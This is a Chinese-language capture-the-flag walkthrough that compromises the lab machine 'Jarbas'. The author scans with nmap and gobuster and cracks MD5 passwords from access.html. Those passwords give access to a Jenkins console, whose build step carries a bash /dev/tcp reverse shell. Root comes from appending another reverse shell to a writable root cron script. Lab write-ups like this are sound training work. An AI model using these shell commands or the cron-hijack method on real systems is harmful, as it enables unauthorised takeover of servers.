靶机环境

攻击机器:172.20.10.6(kali)

目标机器:172.20.10.2(centos)

信息搜集

1
nmap -sn 172.20.10.0/24 #c段扫描

image-20230918163748694

根据新增主机ip可见172.20.10.2主机即为靶机

1
nmap -sT --min-rate 10000 -p- 172.20.10.2 #速度1w进行tcp端口扫描

image-20230918163902942

开放端口如上,利用nmap内置脚本进行简单漏洞扫描和端口信息查询

1
sudo nmap -sT -O -sC -sV -p22,80,3306,8080 172.20.10.2 #TCP扫描端口服务,版本,操作系统

image-20230918164344307

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
Starting Nmap 7.92 ( https://nmap.org ) at 2023-09-18 16:42 CST
Nmap scan report for 172.20.10.2
Host is up (0.0026s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
|   256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
|_  256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Jarbas - O Seu Mordomo Virtual!
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
MAC Address: 5A:61:EE:6E:07:5A (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://

针对每个端口和系统的相关信息进行了总结

1
2
3
4
5
22端口:openssh 7.4版本  ssh-hostkey 
80端口:采用apache服务器和php5.4进行网页布置
3306端口:mysql端口  MariaDB (unauthorized)
8080端口:存在robots.txt文件
linux系统

同时进行一次80端口的目录扫描

1
gobuster dir -u 172.20.10.2:80 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

image-20230918164307385

直接扫描没有结果,采用针对性的对txt,php,html文件进行扫描

1
gobuster dir -u 172.20.10.2:80 -x php,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

image-20230918164740030

存在access.html文件

image-20230918164920579

外网打点

访问目标页面

1
curl 172.20.10.2:80/access.html
image-20230918165006615

是几个明文和md5加密的密码,根据经验应该就是某处的登录账户和密码

解密后结果如下

1
2
3
4
5
tiago:italia99

trindade:marianna

eder:vipsu

访问808端口,是一个jenkins的前台登录界面,采用上方的账户密码进行登录

image-20230918165216435

eder:vipsu登录成功

image-20230918165355098

成功进入后台,进入后台后可以采用搜索其历史漏洞或者自己查找一下有没有比较明显的功能点。新建任务处一般会存在更多可交互的功能点,先试试构建软件项目,

image-20230918165523666

对照功能点挨个查看

image-20230918165611010

这里试了很久,一直到下面看见存在可执行系统命令,因为nmap扫描出我们是linux系统,所以采用Execute shell按钮进行反弹shell的任务构建

image-20230918165642351 
1
bash -i >& /dev/tcp/172.20.10.6/8888 0>&1 #反弹shell到kali机器的8888端口
image-20230918165940132

在提交任务之前kali执行端口监听

1
nc -lvp 8888

提交任务后要记得点击构建任务!成功接受到shell

image-20230918170158527 
1
2
whoami 
id

用户是一个普通用户,尝试提权

image-20230918170235708

提权

通过查看crontab自启动项,可见有root用户设置的每5分钟启动一次的cleaningscript.sh脚本

通过往脚本文件写入反弹shell脚本即可进行提权

image-20230918163233939 
1
echo "bash -i >& /dev/tcp/172.20.10.6/5555 0>&1" >> /etc/script/CleaningScript.sh
image-20230918163207249 
1
cat CleaningScript.sh

成功写入脚本

image-20230918163605928

等待5min自动反弹。

image-20230918163123028